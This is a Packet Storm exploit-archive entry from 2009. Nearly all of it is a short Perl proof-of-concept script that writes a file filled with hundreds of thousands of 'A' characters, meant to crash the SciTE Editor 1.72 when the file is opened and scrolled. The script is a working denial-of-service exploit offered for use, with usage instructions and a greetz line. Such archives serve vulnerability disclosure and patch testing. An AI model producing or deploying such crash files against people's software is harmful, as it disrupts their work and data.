ScITE Editor 1.72 Denial Of Service

2009-07-13T00:00:00
ID PACKETSTORM:79136
Type packetstorm
Reporter prodigy
Modified 2009-07-13T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
#######################################################################  
#  
# ScITE Editor 1.72 crash vulnerability Exploit  
#   
########################################################################  
#  
# Bug Founded by prodigy  
#  
########################################################################  
  
# ### PoC ### #  
  
############################################################################################  
my $owned="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;  
open(myfile,'>>crash.rb');  
print myfile $owned;  
close(myfile);  
############################################################################################  
  
[!]Usage: when you created the file is open with SciTE, and move the scroll bars  
  
############################################################################################  
  
#Greetz: Greetz myself for find the bug, and all the people of undersecurity.net  
  
##########################################################################################  
  
  
`